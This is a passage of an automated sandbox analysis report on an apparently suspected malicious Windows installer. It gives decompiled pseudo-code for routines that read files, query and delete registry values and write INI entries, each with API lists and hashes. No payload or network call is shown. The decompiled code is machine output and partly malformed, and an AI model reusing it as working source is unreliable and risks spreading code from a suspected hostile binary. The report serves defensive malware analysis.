					if(__eax > 0x3ff) {
						 *((intOrPtr*)(__ebp - 0x34)) = 0x3ff;
					}
					if( *__esi == __bl) {
						L22:
						__esi =  *((intOrPtr*)(__ebp - 0x30));
						goto L23;
					} else {
						 *((char*)(__ebp + 0xb)) = __bl;
						 *(__ebp - 8) = E00405B0F(__ecx, __esi);
						if( *((intOrPtr*)(__ebp - 0x34)) <= __ebx) {
							goto L22;
						} else {
							__esi =  *((intOrPtr*)(__ebp - 0x30));
							while(1) {
								__ebp - 0x2c = __ebp - 9;
								__eax = ReadFile( *(__ebp - 8), __ebp - 9, 1, __ebp - 0x2c, __ebx); // executed
								if(__eax == 0 ||  *(__ebp - 0x2c) != 1) {
									break;
								}
								if( *((intOrPtr*)(__ebp - 0x18)) != __ebx) {
									 *(__ebp - 9) & 0x000000ff = E00405AF6(__edi,  *(__ebp - 9) & 0x000000ff);
								} else {
									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
										__al =  *(__ebp - 9);
										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
											__eax = SetFilePointer( *(__ebp - 8), 0xffffffff, __ebx, 1);
										} else {
											 *((char*)(__esi + __edi)) = __al;
											__esi = __esi + 1;
										}
										break;
									} else {
										__al =  *(__ebp - 9);
										 *((char*)(__esi + __edi)) = __al;
										__esi = __esi + 1;
										 *((char*)(__ebp + 0xb)) = __al;
										if(__al == __bl) {
											break;
										} else {
											if(__esi <  *((intOrPtr*)(__ebp - 0x34))) {
												continue;
											} else {
												break;
											}
										}
									}
								}
								goto L26;
							}
							L23:
							 *((char*)(__esi + __edi)) = __bl;
							if(_t40 == 0) {
								 *(_t37 - 4) = 1;
							}
							goto L25;
						}
					}
				}
				L26:
				return 0;
			}






                                  0x00402519
                                  0x0040251c
                                  0x00402521
                                  0x00402524
                                  0x00402527
                                  0x0040289c
                                  0x0040289f
                                  0x0040252d
                                  0x0040252d
                                  0x00402534
                                  0x00402536
                                  0x00402536
                                  0x0040253b
                                  0x004025cf
                                  0x004025cf
                                  0x00000000
                                  0x00402541
                                  0x00402542
                                  0x0040254d
                                  0x00402550
                                  0x00000000
                                  0x00402552
                                  0x00402552
                                  0x00402555
                                  0x0040255a
                                  0x00402563
                                  0x0040256b
                                  0x00000000
                                  0x00000000
                                  0x00402576
                                  0x0040259f
                                  0x00402578
                                  0x0040257c
                                  0x004025a9
                                  0x004025af
                                  0x004025c7
                                  0x004025b9
                                  0x004025b9
                                  0x004025bc
                                  0x004025bc
                                  0x00000000
                                  0x00402584
                                  0x00402584
                                  0x00402587
                                  0x0040258a
                                  0x0040258d
                                  0x00402590
                                  0x00000000
                                  0x00402592
                                  0x00402595
                                  0x00000000
                                  0x00402597
                                  0x00000000
                                  0x00402597
                                  0x00402595
                                  0x00402590
                                  0x0040257c
                                  0x00000000
                                  0x00402576
                                  0x004025d2
                                  0x004025d2
                                  0x004015a8
                                  0x0040266d
                                  0x0040266d
                                  0x00000000
                                  0x004015a8
                                  0x00402550
                                  0x0040253b
                                  0x004028a5
                                  0x004028ab

                                  APIs
                                  • ReadFile.KERNELBASE(?,?,00000001,?,?,?,00000002), ref: 00402563
                                    • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FileReadwsprintf
                                  • String ID:
                                  • API String ID: 3326442220-0
                                  • Opcode ID: 65f80271cd79c5aa039eb1f58c142b472b49f515f6f0f39dbbd02c749ab5cc01
                                  • Instruction ID: 06e7f106e31df8bdef2bd810d63df5d3c97d0fbe38466024ce319a2e702c6f31
                                  • Opcode Fuzzy Hash: 65f80271cd79c5aa039eb1f58c142b472b49f515f6f0f39dbbd02c749ab5cc01
                                  • Instruction Fuzzy Hash: D521E1B1D05299FFDF219B948E686AEBB759B01304F14407BF481B62D2D6B88A81C72D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004023C6 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E004023C6(int* __ebx, char* __esi) {
				void* _t17;
				char* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402B11(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402A07(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x2c) = 0x400;
					if(RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x2c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x14) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x14) == __ebx;
							E00405AF6(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x14);
								_t35[0x3ff] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33);
					RegCloseKey();
				}
				 *0x42ec28 =  *0x42ec28 +  *(_t37 - 4);
				return 0;
			}








                                  0x004023c6
                                  0x004023c6
                                  0x004023cb
                                  0x004023d2
                                  0x004023d4
                                  0x004023db
                                  0x004023dd
                                  0x0040266d
                                  0x004023e3
                                  0x004023e6
                                  0x00402401
                                  0x00402431
                                  0x00402431
                                  0x00402433
                                  0x00402403
                                  0x00402407
                                  0x00402420
                                  0x00402427
                                  0x0040242a
                                  0x00402409
                                  0x0040240c
                                  0x00402417
                                  0x00402487
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040240c
                                  0x00402407
                                  0x0040248d
                                  0x0040248e
                                  0x0040248e
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                    • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B39
                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F6
                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsuD883.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040248E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: ee9e458ceb1ad02052770f1157f21e839e5b4edcc6ae75105c93fe669e782df6
                                  • Instruction ID: 229bf70010f867cab42174c5808720b5045325e5d967dec612ec992921af3bc6
                                  • Opcode Fuzzy Hash: ee9e458ceb1ad02052770f1157f21e839e5b4edcc6ae75105c93fe669e782df6
                                  • Instruction Fuzzy Hash: D911A331D05205EFDB15CFA4CA885AFBBB4AF04344F20843FE446B72C0D6B85A41DB2A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42ebd0; // 0x5aa88c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e38c =  *0x42e38c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e38c, 0x7530,  *0x42e374), 0);
					}
				}
				return 0;
			}












                                  0x0040138a
                                  0x004013fa
                                  0x00401392
                                  0x0040139b
                                  0x004013a0
                                  0x00000000
                                  0x00000000
                                  0x004013a2
                                  0x004013a3
                                  0x004013ad
                                  0x00000000
                                  0x00401404
                                  0x004013b0
                                  0x004013b7
                                  0x004013bd
                                  0x004013be
                                  0x004013c0
                                  0x004013c2
                                  0x004013b9
                                  0x004013b9
                                  0x004013ba
                                  0x004013ba
                                  0x004013c9
                                  0x004013cb
                                  0x004013f4
                                  0x004013f4
                                  0x004013c9
                                  0x00000000

                                  APIs
                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                  • SendMessageA.USER32 ref: 004013F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 6a14d1f73b45d8c574bbb08bd463b0fecddd08d442bdf50b9e33ff1249aac855
                                  • Instruction ID: 2f867942e182ee5f7aafd3a4eddd62757609932d8a5da55f1e4142973db533dc
                                  • Opcode Fuzzy Hash: 6a14d1f73b45d8c574bbb08bd463b0fecddd08d442bdf50b9e33ff1249aac855
                                  • Instruction Fuzzy Hash: 0F01F431B242109BE7298B399C04B6A36D8E710325F10863BF811F72F1D678DC039B4D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004022BE Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004022BE(void* __ebx) {
				char* _t6;
				long _t8;
				void* _t15;
				long _t19;
				void* _t22;
				void* _t23;

				_t15 = __ebx;
				_t26 =  *(_t23 - 0x14) - __ebx;
				if( *(_t23 - 0x14) != __ebx) {
					_t6 = E00402A07(0x22);
					_t18 =  *(_t23 - 0x14) & 0x00000002;
					__eflags =  *(_t23 - 0x14) & 0x00000002;
					_t8 = E00402A47(E00402AFC( *((intOrPtr*)(_t23 - 0x20))), _t6, _t18); // executed
					_t19 = _t8;
					goto L4;
				} else {
					_t22 = E00402B11(_t26, 2);
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t19 = RegDeleteValueA(_t22, E00402A07(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t19 != _t15) {
							goto L6;
						}
					}
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                  0x004022be
                                  0x004022be
                                  0x004022c1
                                  0x004022f0
                                  0x004022f8
                                  0x004022f8
                                  0x00402306
                                  0x0040230b
                                  0x00000000
                                  0x004022c3
                                  0x004022ca
                                  0x004022ce
                                  0x0040266d
                                  0x0040266d
                                  0x004022d4
                                  0x004022e4
                                  0x004022e6
                                  0x0040230d
                                  0x0040230f
                                  0x00000000
                                  0x00402315
                                  0x0040230f
                                  0x004022ce
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                    • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B39
                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DD
                                  • RegCloseKey.ADVAPI32(00000000), ref: 004022E6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CloseDeleteOpenValue
                                  • String ID:
                                  • API String ID: 849931509-0
                                  • Opcode ID: c04a8f36ed96f6be7afbf45aede88929f47c8ed0e9b87cf67fe829169f25e1a4
                                  • Instruction ID: 0038f50324932004c091ce3bbea58ac29e0da352c26995222e1fcab20123e112
                                  • Opcode Fuzzy Hash: c04a8f36ed96f6be7afbf45aede88929f47c8ed0e9b87cf67fe829169f25e1a4
                                  • Instruction Fuzzy Hash: ABF0AF32A00110ABDB10BBF58E8EEAE62689B40318F10053BF501B71C1D9FD5D01966E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004019F1 Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004019F1(char __ebx) {
				CHAR* _t7;
				long _t8;
				char _t12;
				CHAR* _t17;
				void* _t19;

				_t12 = __ebx;
				_t7 = E00402A07(1);
				 *(_t19 + 8) = _t7;
				_t8 = ExpandEnvironmentStringsA(_t7, _t17, 0x400); // executed
				if(_t8 == 0 ||  *((intOrPtr*)(_t19 - 0x1c)) != __ebx && lstrcmpA( *(_t19 + 8), _t17) == 0) {
					 *((intOrPtr*)(_t19 - 4)) = 1;
					 *_t17 = _t12;
				}
				_t17[0x3ff] = _t12;
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}








                                  0x004019f1
                                  0x004019f5
                                  0x00401a01
                                  0x00401a04
                                  0x00401a0c
                                  0x00401a21
                                  0x00401a24
                                  0x00401a24
                                  0x00401a26
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A04
                                  • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A17
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: EnvironmentExpandStringslstrcmp
                                  • String ID:
                                  • API String ID: 1938659011-0
                                  • Opcode ID: f2bb0fb77bd637ba619c739f690f83387884a2b26abca135dc1c3c7e0cdf15c4
                                  • Instruction ID: afb86ebb905af139dc7494b608cce5e0607b26c706a03dcc942419ad1d9f91eb
                                  • Opcode Fuzzy Hash: f2bb0fb77bd637ba619c739f690f83387884a2b26abca135dc1c3c7e0cdf15c4
                                  • Instruction Fuzzy Hash: 95F02032F06240EBCB21CFAADD48AABBFE8DF51350B10403BE508F2290D6388501CB5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                  • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                  • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Window$EnableShow
                                  • String ID:
                                  • API String ID: 1136574915-0
                                  • Opcode ID: 2c8e27dbc072caeb4317b02db2b6e6eace6336ff82acc8787d8b55f2e388984e
                                  • Instruction ID: 1f6c93b120dc61c6d4456c8bda968d24c35af38667243ca5670bd8e00a7a4229
                                  • Opcode Fuzzy Hash: 2c8e27dbc072caeb4317b02db2b6e6eace6336ff82acc8787d8b55f2e388984e
                                  • Instruction Fuzzy Hash: 14E0C273B04110DBDB20BBF5AE4AA6E3364EF00369B100837F102F10D1D6B99C40866E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405846 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00405846(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                  0x0040584a
                                  0x00405857
                                  0x0040586c
                                  0x00405872

                                  APIs
                                  • GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 0040584A
                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040586C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  • String ID:
                                  • API String ID: 415043291-0
                                  • Opcode ID: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                  • Instruction ID: d58f26a5a32defaeeb3d325f121af029a3aa60b04f4a5bd1c9a51958cab5ad8a
                                  • Opcode Fuzzy Hash: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                  • Instruction Fuzzy Hash: B8D09E31658301AFEF098F20DE16F2EBBA2EB84B01F10962CB642940E0D6715C15DB16
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405821 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405821(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                  0x00405826
                                  0x0040582c
                                  0x00405831
                                  0x0040583a
                                  0x0040583a
                                  0x00405843

                                  APIs
                                  • GetFileAttributesA.KERNELBASE(?,?,00405439,?,?,00000000,0040561C,?,?,?,?), ref: 00405826
                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040583A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                  • Instruction ID: 17f37b219c6dc411dd2b2fa4057394c3483c25ebcdd970f38988b6a36dadc869
                                  • Opcode Fuzzy Hash: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                  • Instruction Fuzzy Hash: F5D01272908120BFC2113728EE0C89BBF95DB54371B018F31FD69A22F0C7304C62CA95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402239 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00402239(int __eax, CHAR* __ebx) {
				CHAR* _t11;
				void* _t13;
				CHAR* _t14;
				void* _t18;
				int _t22;

				_t11 = __ebx;
				_t5 = __eax;
				_t14 = 0;
				if(__eax != __ebx) {
					__eax = E00402A07(__ebx);
				}
				if(_t13 != _t11) {
					_t14 = E00402A07(0x11);
				}
				if( *((intOrPtr*)(_t18 - 0x14)) != _t11) {
					_t11 = E00402A07(0x22);
				}
				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E00402A07(0xffffffcd)); // executed
				_t22 = _t5;
				if(_t22 == 0) {
					 *((intOrPtr*)(_t18 - 4)) = 1;
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t18 - 4));
				return 0;
			}








                                  0x00402239
                                  0x00402239
                                  0x0040223b
                                  0x0040223f
                                  0x00402242
                                  0x0040224a
                                  0x0040224e
                                  0x00402257
                                  0x00402257
                                  0x0040225c
                                  0x00402265
                                  0x00402265
                                  0x00402272
                                  0x004015a6
                                  0x004015a8
                                  0x0040266d
                                  0x0040266d
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402272
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: PrivateProfileStringWrite
                                  • String ID:
                                  • API String ID: 390214022-0
                                  • Opcode ID: c7b122aad6aafb3e384dd29e2e634c2e76d40bd9855d3ea0291e0a4436e423b8
                                  • Instruction ID: 594037780aef2bbb7222699eae6bef26f59cc054eef20af3a1b4cc0f61f7743a
                                  • Opcode Fuzzy Hash: c7b122aad6aafb3e384dd29e2e634c2e76d40bd9855d3ea0291e0a4436e423b8
                                  • Instruction Fuzzy Hash: ADE04F32B001E56ADB207AF18ECDD7FA1589B8434CB15017FF601B62C2DDBC2D418AA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004025DD Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 44%
                                  			E004025DD(void* __eflags) {
				long _t6;
				long _t8;
				LONG* _t10;
				void* _t12;
				void* _t15;
				void* _t17;

				_push(ds);
				if(__eflags != 0) {
					_t6 = E004029EA(2);
					_t8 = SetFilePointer(E00405B0F(_t12, _t15), _t6, _t10,  *(_t17 - 0x18)); // executed
					if( *((intOrPtr*)(_t17 - 0x20)) >= _t10) {
						_push(_t8);
						E00405AF6();
					}
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                  0x004025dd
                                  0x004025de
                                  0x004025ea
                                  0x004025f7
                                  0x00402600
                                  0x00402842
                                  0x00402844
                                  0x00402844
                                  0x00402600
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025F7
                                    • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
